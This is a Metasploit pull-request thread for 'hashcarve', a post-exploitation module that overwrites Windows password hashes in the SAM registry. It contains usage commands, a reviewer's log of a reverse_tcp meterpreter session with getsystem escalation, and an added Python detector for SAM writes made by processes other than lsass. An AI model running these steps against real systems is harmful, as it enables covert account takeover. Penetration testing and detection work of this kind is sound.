
Module that changes a user's passwords by editing the SAM registry #7685

Merged
merged 9 commits into from Dec 16, 2016

Conversation

p3nt4
Contributor

@p3nt4 p3nt4 commented Dec 9, 2016

Overview

This module changes a user's password by carving a hash in the Windows registry.

  1. It doesn't change the "password last changed" field
  2. You can set a hash directly, so you can change a user's password and revert it without cracking its hash.
  3. It bypasses the password complexity requirements

Module Options

  • USER - This option allows you to specify the user you wish to change the password of.
  • PASS - This option allows you to specify the password to be set in the form of a clear text password, a single NT hash, or a couple of LM:NT hashes.

Module Process

Here is the process that the module follows:

  • Retrieves list of users from the registry.
  • If the user is found it attempts to:
    • load the user key from the registry
    • check if the LM and NT hashes exist in the key
    • replace the hashes if they exist
    • write the user key back into the registry

Recommendations

I would recommend using hashdump before this module to back up the user hashes.
Use at your own risk.

Limitations

At some point, Windows 10 stopped storing users in that exact way; users whose password was set after that change would not be vulnerable. This will be updated once someone figures out how the hashes are now stored.

The module does not modify the user key architecture, so you cannot set a hash on a user that does not have a password.

Usage

  • run post/windows/manage/hashcarve user=test pass=password
  • run post/windows/manage/hashcarve user=test pass=nthash
  • run post/windows/manage/hashcarve user=test pass=lmhash:nthash

This module "carves" a hash in the registries to set it as a user password.

The benefits are:
1/ It doesn't change the password last change field
2/ You can set a hash directly, so you can change a user's password and revert it without cracking its hash.

I have tested it on Windows 7 and 8.1. It should work on every version, though.

Usage:
  run post/windows/manage/hashcarve user=test pass=<password>
  run post/windows/manage/hashcarve user=test pass=<nthash>
  run post/windows/manage/hashcarve user=test pass=<lmhash:nthash>

This work is based on the hashdump implementation.
@p3nt4 p3nt4 changed the title Initial Commit Module that changes a user's passwords by editing the SAM registry Dec 9, 2016
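A defender-side counterpart to the module process described above, added here as an example and not code from this PR or from the framework: it flags direct writes to a user's SAM record that do not come from lsass.exe, which is the kind of write this module performs. It assumes Sysmon-style registry "value set" telemetry (Event ID 13) flattened to `key=value` text, the SAM layout `HKLM\SAM\SAM\Domains\Account\Users\<RID>\V` that the framework's hashdump reads (the `000003E8` RID in the samples is the same id format the test run on this page prints), and lsass.exe as the only expected writer of that record; the log lines, process paths and RIDs are constructed.

```python
"""Flag registry writes to a user's SAM record that bypass lsass.exe.

Added example for this PR thread, not part of the hashcarve module.
Input format (Sysmon Event ID 13 flattened to key=value) is an assumption.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Constructed sample events: one legitimate write by lsass.exe, one write to
# the same user record by an unexpected binary, one unrelated Run-key write,
# and one key-level event (ID 12) that this check deliberately ignores.
SAMPLE_EVENTS = [
    r'EventID=13 Image=C:\Windows\System32\lsass.exe TargetObject=HKLM\SAM\SAM\Domains\Account\Users\000003E8\V',
    r'EventID=13 Image=C:\Windows\Temp\updater.exe TargetObject=HKLM\SAM\SAM\Domains\Account\Users\000003E8\V',
    r'EventID=13 Image=C:\Windows\System32\svchost.exe TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater',
    r'EventID=12 Image=C:\Windows\regedit.exe TargetObject=HKLM\SAM\SAM\Domains\Account\Users\000001F4\F',
]

FIELD_RE = re.compile(r'(\w+)=(\S+)')

# Per-user record under the SAM hive: 8 hex digits of RID, then the V value
# (where hashdump reads the LM/NT hashes) or the F value (the rest of the
# account record). Which value the module touches is inferred from its
# "Module Process" description, not from its source.
SAM_USER_RE = re.compile(
    r'^HKLM\\SAM\\SAM\\Domains\\Account\\Users\\([0-9A-Fa-f]{8})\\([VF])$'
)

# Assumption: on a healthy host only lsass.exe should rewrite these values.
TRUSTED_WRITERS = {r'c:\windows\system32\lsass.exe'}


@dataclass
class Finding:
    rid: int        # relative id of the account whose record was rewritten
    image: str      # process that performed the write
    value: str      # 'V' (hashes) or 'F' (account record)


def parse_event(line: str) -> dict:
    """Turn one flattened 'k=v k=v' line into a dict (values hold no spaces)."""
    return {k: v for k, v in FIELD_RE.findall(line)}


def classify(event: dict) -> Optional[Finding]:
    """Return a Finding for a value write to a SAM user record by an
    untrusted process, None otherwise."""
    if event.get('EventID') != '13':        # only value-set events
        return None
    m = SAM_USER_RE.match(event.get('TargetObject', ''))
    if not m:
        return None
    image = event.get('Image', '')
    if image.lower() in TRUSTED_WRITERS:
        return None
    rid_hex, value = m.groups()
    return Finding(rid=int(rid_hex, 16), image=image, value=value)


def scan(lines: Iterable[str]) -> List[Finding]:
    """Run classify() over every log line and collect the hits."""
    findings = []
    for line in lines:
        finding = classify(parse_event(line))
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_EVENTS):
        print(f'SAM record rewrite: RID {f.rid} value {f.value} by {f.image}')
```

Only the write by the unexpected binary to `Users\000003E8\V` is reported; the lsass.exe write to the same value, the Run-key write and the key-level event are not. A real deployment would feed this the Sysmon channel rather than constructed lines and would tune `TRUSTED_WRITERS` to the host's own process inventory.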
@mubix
Contributor

mubix commented Dec 12, 2016

This is pretty awesome; not sure I'll have time to test soon, but it is certainly a useful module.

@bwatters-r7 bwatters-r7 self-assigned this Dec 16, 2016
@bwatters-r7
Contributor

bwatters-r7 commented Dec 16, 2016

Testing

Win7x64:

bwatters@ubuntu:~/rapid7/metasploit-framework$ ./msfconsole -q
msf exploit(handler) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(handler) > set lport 4567
lport => 4567
msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (1189935 bytes) to <TARGET_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <TARGET_IP>:49167) at 2016-12-16 12:55:28 -0600

meterpreter > sysinfo
Computer        : WIN-CMLEMCUFOB2
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN-CMLEMCUFOB2\bwatters
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > 
Background session 1? [y/N]  y
msf exploit(handler) > use post/windows/manage/hashcarve 
msf post(hashcarve) > set user bwatters
user => bwatters
msf post(hashcarve) > set pass newpassword
pass => newpassword
msf post(hashcarve) > set session 1
session => 1

msf post(hashcarve) > run

[*] Password detected as clear text, generating hashes:
LM Hash: <HASH>
NT Hash: <HASH>
[*] Searching for user
User found with id: 000003e8
[*] Loading user key
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY <KEY>...
[*] Modifying user key
[*] Modifiying LM hash
[-] LM hash does not exist, skipping
[*] Modifiying NT hash
[*] Carving user key
[*] Completed! Let's hope for the best
[*] Post module execution completed
[*] <TARGET_IP> - Meterpreter session 1 closed.  Reason: Died
msf post(hashcarve) > 

I should specify that it worked.
Very cool module!

@bwatters-r7
Contributor

Also, FYI, works on 8.1x64.

@p3nt4
Contributor Author

p3nt4 commented Dec 16, 2016

Thanks for reviewing.

Did it crash your box?

Lsass would often crash while I was researching this, but I haven't had an issue with the latest version of the code.

@bwatters-r7
Contributor

Not at all; it worked like a charm on both 7x64 and 8.1x64, with no crashes, hiccups, or odd behavior. Well, it is an odd sensation logging into Windows with just the character 'x'...

@p3nt4
Contributor Author

p3nt4 commented Dec 16, 2016

Cool. I was confused by your test, as the session died.
Glad you like it.

@bwatters-r7
Contributor

heh..... nope. That was me rebooting the VM to see if the changes would persist/flag anything. Just too lazy to exit first.

@tdoan-r7
Contributor

Release Notes

The hashcarve module is now available in the framework. You can use it to change a user's password by carving a hash in the Windows registry.

@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Dec 20, 2016